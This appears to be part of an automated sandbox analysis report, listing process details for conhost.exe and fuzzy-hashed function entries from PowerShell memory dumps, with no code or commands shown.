                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff778180000
                                                                                                File size:875'008 bytes
                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Disassembly

                                                                                                Reset < >

                                                                                                  Executed Functions

                                                                                                  Function 00007FFD3B0783D6 Relevance: .5, Instructions: 482COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 229084ac625cb6752b0fac223475f5aa7e753c773c21edfb2a15a7ace9f8263c
                                                                                                  • Instruction ID: 691b0ae579be170d7020fac569b4924684f844816a047676ac578daacfa67b71
                                                                                                  • Opcode Fuzzy Hash: 229084ac625cb6752b0fac223475f5aa7e753c773c21edfb2a15a7ace9f8263c
                                                                                                  • Instruction Fuzzy Hash: E6F19330A09B8D8FEBA8DF28CC567E977E1FF55310F04426AE84DC7291DB34A9459B81
                                                                                                  Function 00007FFD3B079182 Relevance: .5, Instructions: 468COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 90a14469c36c032f1abaf82a4a4c4e1ed705b6a7f4c0813df858e26eb2ae2ca3
                                                                                                  • Instruction ID: 851fe83ba6252f023b961240a9335dc9aac3042b8fa3dd877caf901fcab7e6d2
                                                                                                  • Opcode Fuzzy Hash: 90a14469c36c032f1abaf82a4a4c4e1ed705b6a7f4c0813df858e26eb2ae2ca3
                                                                                                  • Instruction Fuzzy Hash: EEE1C730A0DA4D8FEBA8DF28C8567E977E1FF55310F14426ED88DC72A1CE74A8459B81
                                                                                                  Function 00007FFD3B063379 Relevance: .4, Instructions: 393COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: df183cf8561d6438daaf2d7fa794ad8d8c5f3aec6dcd1ede2916745f9b8b24da
                                                                                                  • Instruction ID: b719fed27ee985e5fff4601b588d43fe48174c18e76f790c1c69b168ac10ec5a
                                                                                                  • Opcode Fuzzy Hash: df183cf8561d6438daaf2d7fa794ad8d8c5f3aec6dcd1ede2916745f9b8b24da
                                                                                                  • Instruction Fuzzy Hash: 30D18030A08A4D8FDF99DF6CC455AA9BBF1FFA9310F14416AD449D7296CA24E881DBC0
                                                                                                  Function 00007FFD3B078D96 Relevance: .3, Instructions: 338COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e8bcd2948d5fa4637924c9db2bb6b70715d62e2c20fd9878cc8f503dcb6fa072
                                                                                                  • Instruction ID: a3b3290ed3ddc2fce3d8b659e8d646c8950c5aab442e1dc9be39061b326e2bd4
                                                                                                  • Opcode Fuzzy Hash: e8bcd2948d5fa4637924c9db2bb6b70715d62e2c20fd9878cc8f503dcb6fa072
                                                                                                  • Instruction Fuzzy Hash: 07B1B63060DB8D4FEBA9DF28C8567E97BE1EF55310F04426EE88DC7291CA349945DB82
                                                                                                  Function 00007FFD3AF4EC60 Relevance: .1, Instructions: 134COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6055805029.00007FFD3AF4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3AF4D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3af4d000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2c2e84bcc1047a290df7fd0fbd6c7ee544703e9f16e9d4bd7ad14531ae3a0f1c
                                                                                                  • Instruction ID: ec4114145711b738ccb19d645684f138bccf16eb2caaeab5d710c528a1fcfbba
                                                                                                  • Opcode Fuzzy Hash: 2c2e84bcc1047a290df7fd0fbd6c7ee544703e9f16e9d4bd7ad14531ae3a0f1c
                                                                                                  • Instruction Fuzzy Hash: 20413B3060DBC44FE75A8B2CDC55A923FF0EF56324B1506EFE088CB1A3D625A846C792
                                                                                                  Function 00007FFD3B07299A Relevance: .1, Instructions: 124COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 23dd5ea0d418c633ec17b7178f77069535e168cb2521e4876c9a53986fd70932
                                                                                                  • Instruction ID: 9656b0109d061cf360f07cc18155b6657f58816cd80202ae4e5fd1fcde2f5d8f
                                                                                                  • Opcode Fuzzy Hash: 23dd5ea0d418c633ec17b7178f77069535e168cb2521e4876c9a53986fd70932
                                                                                                  • Instruction Fuzzy Hash: AD31C571A1CB4C9FDB189F5C984A6A9BBE0FB99311F00426FE449C3252DB70A8558BC2
                                                                                                  Function 00007FFD3B073228 Relevance: .1, Instructions: 101COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 455f54167810e986e3300becf833c353cd79103448ea11223b89aa9a87fbf52a
                                                                                                  • Instruction ID: 1cd02538347c1275c91627863ab6f9dd1e4d55ef34f0bac12243497280fb988a
                                                                                                  • Opcode Fuzzy Hash: 455f54167810e986e3300becf833c353cd79103448ea11223b89aa9a87fbf52a
                                                                                                  • Instruction Fuzzy Hash: 6C210A3190CB4C4FEB59DFAC9C4A7E97BE0EB96321F04426FD048C3152DA74981ACB51
                                                                                                  Function 00007FFD3B078894 Relevance: .1, Instructions: 91COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c5ac1ef3f4a96a415415554df401732aa3cc8304f19c792d9124e1c98779c8f2
                                                                                                  • Instruction ID: 9dde927dbcca83061cd24c0eed393b8d1bfece414aa912f02e896b30fb609fa3
                                                                                                  • Opcode Fuzzy Hash: c5ac1ef3f4a96a415415554df401732aa3cc8304f19c792d9124e1c98779c8f2
                                                                                                  • Instruction Fuzzy Hash: 83314F30A1A65E8EFBB89F15CC6ABF97290FF42314F404138D58D860A2DF386945EB12
                                                                                                  Function 00007FFD3B065965 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 74c5df7715b7d009bf0b2654a772609c5eb0b53b120d07d8475d6608dc7228b5
                                                                                                  • Instruction ID: c56a79183bb6812d19f27c569f9b9aef042e060abeb188bdec576c66832e687c
                                                                                                  • Opcode Fuzzy Hash: 74c5df7715b7d009bf0b2654a772609c5eb0b53b120d07d8475d6608dc7228b5
                                                                                                  • Instruction Fuzzy Hash: 1C01677121CB0C4FD748EF4CE452AA5B7E0FB99324F10056EE58AC3661DA36E892CB45
                                                                                                  Function 00007FFD3B311C72 Relevance: .0, Instructions: 39COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6061359052.00007FFD3B310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B310000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3b310000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bb134d38695a347be197176e9c9963fdfa0710ddaa8da1daba4aa653221ce86f
                                                                                                  • Instruction ID: 0caec8ef0a94ed144545cfdb5d45d808ca2aceddfd721dc5093896ee66abc340
                                                                                                  • Opcode Fuzzy Hash: bb134d38695a347be197176e9c9963fdfa0710ddaa8da1daba4aa653221ce86f
                                                                                                  • Instruction Fuzzy Hash: 58F01D32B0D9544FD759BB48E4515A873E0EF46320B1410F6E15DC7563DA25EC01C744
                                                                                                  Function 00007FFD3B073070 Relevance: .0, Instructions: 36COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d93cd0a0bf1041d544b62a9297df30e678a47a202fdf650ebc88dfc7ec20e96c
                                                                                                  • Instruction ID: 731a8f2c5c8f12af09ee1e09eb85052f5da8d103892cdb24b4ae77348cfff986
                                                                                                  • Opcode Fuzzy Hash: d93cd0a0bf1041d544b62a9297df30e678a47a202fdf650ebc88dfc7ec20e96c
                                                                                                  • Instruction Fuzzy Hash: 09F0F63180C6CD8FDB069F388C664D4BFA0EF27210B0502DAD448C70A2DA649558CBD2
                                                                                                  Function 00007FFD3B311F20 Relevance: .0, Instructions: 35COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6061359052.00007FFD3B310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B310000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3b310000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6748c6b539d9e3799cfd6b53bd2abb2ba0fb02aff1cfba85c0494c3a8de0d22a
                                                                                                  • Instruction ID: 4ca8d7e929cac41bc852b7471264489951e43a7268675b3c7c2bc36e1aafa859
                                                                                                  • Opcode Fuzzy Hash: 6748c6b539d9e3799cfd6b53bd2abb2ba0fb02aff1cfba85c0494c3a8de0d22a
                                                                                                  • Instruction Fuzzy Hash: CDF03A32B0D9548FDB98BB88E4514E877E4EF06320B5410F6E15DCB463DB25EC41C740

                                                                                                  Non-executed Functions

                                                                                                  Function 00007FFD3B06CCDB Relevance: 2.0, Strings: 1, Instructions: 786COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0/;
                                                                                                  • API String ID: 0-2887988655
                                                                                                  • Opcode ID: 2d57f0b912ae618e5b72b271d96dc12e9885eccc9ab5f2bd77a46e8a4c4b0419
                                                                                                  • Instruction ID: e339730c2dfd11f65969e25eed95554fd6ca0c4fc860072c07a880451694b8bb
                                                                                                  • Opcode Fuzzy Hash: 2d57f0b912ae618e5b72b271d96dc12e9885eccc9ab5f2bd77a46e8a4c4b0419
                                                                                                  • Instruction Fuzzy Hash: 65421B33B0D6964FEBA6DB1CC4B66E93BA0EF56310B0501BBC1C9D7193DE25A842D781
                                                                                                  Function 00007FFD3B06C763 Relevance: 1.8, Strings: 1, Instructions: 540COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @8_
                                                                                                  • API String ID: 0-3079568424
                                                                                                  • Opcode ID: 004ec2b99400c18c91c68749ae1026c701fbf4ebdb04779a00f389706141cc09
                                                                                                  • Instruction ID: fa81330cc9a38699f1045e7b2fa724060070eed0c02e55abeaa7ff87824fc681
                                                                                                  • Opcode Fuzzy Hash: 004ec2b99400c18c91c68749ae1026c701fbf4ebdb04779a00f389706141cc09
                                                                                                  • Instruction Fuzzy Hash: 06F1E853B0F6D65FE7769A3C98B62E57F90DF93224B0901F7C1C88E0A3DD186846A352
                                                                                                  Function 00007FFD3B070C8A Relevance: .9, Instructions: 865COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dc4295da80893b79011a55e921637ad6018ee76f892e73942a479fb771e1633a
                                                                                                  • Instruction ID: 55a4449e16f2f34a3168de0b3365fd4590678fd384ea67c74f8460b63f1bd16d
                                                                                                  • Opcode Fuzzy Hash: dc4295da80893b79011a55e921637ad6018ee76f892e73942a479fb771e1633a
                                                                                                  • Instruction Fuzzy Hash: 04C18653B0E7D24BE7136A6C9CB70E57F60DF9326574A01F7C1C4CB0A3D919684BA262
                                                                                                  Function 00007FFD3B2D3223 Relevance: .3, Instructions: 283COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6060891046.00007FFD3B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B2D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3b2d0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 98534e838fe9b0adbe02e6714ffea92e3dfe247b7bae5cdf8f5b25e826f75c79
                                                                                                  • Instruction ID: df4015327c7c987d2bb9b51407c46a68ee4f2e54414311d13357a001a7501e7c
                                                                                                  • Opcode Fuzzy Hash: 98534e838fe9b0adbe02e6714ffea92e3dfe247b7bae5cdf8f5b25e826f75c79
                                                                                                  • Instruction Fuzzy Hash: 12917932A0FA8D4FD7969B7898A45A57BE0EF56320B0402FFD49CC70A3DE289D05C352
                                                                                                  Function 00007FFD3B062395 Relevance: .2, Instructions: 235COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f183e2743e208e065993dc936e912c80ea35060ecd0363531a8d741cb924fa8b
                                                                                                  • Instruction ID: f4afe511cafc8eb57927105f64ab7a4044f166e324dbf2cbf82f1857aac6e10f
                                                                                                  • Opcode Fuzzy Hash: f183e2743e208e065993dc936e912c80ea35060ecd0363531a8d741cb924fa8b
                                                                                                  • Instruction Fuzzy Hash: 39719F57F0F6D24FE712866898761E9BFA0EF5322570A01F7C5C48F4A3DA1D2806B761
                                                                                                  Function 00007FFD3B06E9A5 Relevance: 16.5, Strings: 13, Instructions: 274COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @;$0@;$8@;$@@;$WL_I$XL_I$X@;$X@;$`@;$h@;$pN/;$x@;$@;
                                                                                                  • API String ID: 0-481145736
                                                                                                  • Opcode ID: f011fd779186b0de5e94510108b491bf8b06aaed20afeec2587fc6876fd32e82
                                                                                                  • Instruction ID: f681cc302be899756b1b73477994c6dcbcdce75578c59343b3931869db38863a
                                                                                                  • Opcode Fuzzy Hash: f011fd779186b0de5e94510108b491bf8b06aaed20afeec2587fc6876fd32e82
                                                                                                  • Instruction Fuzzy Hash: 8A713963F0FAC90FE6A5451C28372796B81EF9326075845FBD1D8870EBEC05AC0AA685
                                                                                                  Function 00007FFD3B06F660 Relevance: 7.9, Strings: 6, Instructions: 354COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0@;$P@;$_$x@;$@;$@;
                                                                                                  • API String ID: 0-915576283
                                                                                                  • Opcode ID: 1980be5a482838ab551023b5443123860c469ed1f2d6122f8188f4eb8da8393a
                                                                                                  • Instruction ID: 32779dd73755c246f864d649ab6afc3673e3e9ad93d3cb2a599d6951da00d88a
                                                                                                  • Opcode Fuzzy Hash: 1980be5a482838ab551023b5443123860c469ed1f2d6122f8188f4eb8da8393a
                                                                                                  • Instruction Fuzzy Hash: 98A1AF13B0D5924EE726BBBCB8661FC7B60DFD3376B0044B7D2C48A0A78D24584A97D6
                                                                                                  Function 00007FFD3B06873D Relevance: 5.4, Strings: 4, Instructions: 379COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: L_^$L_^$L_^$L_^
                                                                                                  • API String ID: 0-2357752022
                                                                                                  • Opcode ID: f0549fc14f1daa6b03bb0893fb42968faff54b678705fcfe54c6903e8a8a3098
                                                                                                  • Instruction ID: 70286978a3b4533b2f91c2a1be525e87120eece57593e83b9869ee08398f9f76
                                                                                                  • Opcode Fuzzy Hash: f0549fc14f1daa6b03bb0893fb42968faff54b678705fcfe54c6903e8a8a3098
                                                                                                  • Instruction Fuzzy Hash: B0513EA2A0E7C25FE7435B3958F62947FB0EF6721474D01FBC1C44A0A3ED64581AA726